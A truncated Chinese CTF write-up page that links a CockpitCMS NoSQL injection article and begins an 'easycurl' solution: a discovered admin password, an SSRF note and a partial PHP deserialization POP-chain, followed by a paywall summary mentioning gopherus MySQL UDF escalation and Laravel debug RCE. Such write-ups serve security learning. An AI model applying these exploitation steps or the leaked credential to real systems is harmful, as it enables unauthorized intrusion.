nosql
CockpitCMS NoSQL注入漏洞
参考文章
https://www.anquanke.com/post/id/241113







easycurl
扫后台发现app文件,里面有admin的密码R1nd0_1s_n3k0,
登录后可以进到admin.php里面,发现可以执行反序列化,题目提示存在common.php.bak 里面有一堆类,看来是要构造pop链了.
request函数存在ssrf漏洞

pop链如下
<?php
class User
{
public $username;
public $session_id='1';
public function __construct($username)
{
$this->username=$username;
}
}
class cache_parser{
public $user;
public $user_cache='aaa';
public $default_handler;
public $logger;
public function __construct($cache_parser,$url)
{
$this->user = new User('aaa');
$this

本文详细介绍了通过CockpitCMS的NoSQL注入漏洞和easycurl的SSRF漏洞,进行了一系列的安全攻击操作,包括构造POP链、利用gopherus工具执行MySQL UDF提权,以及laravel应用中的debug RCE漏洞。通过这些攻击手段,最终成功获取敏感信息并执行恶意代码。
最低0.47元/天 解锁文章
2299





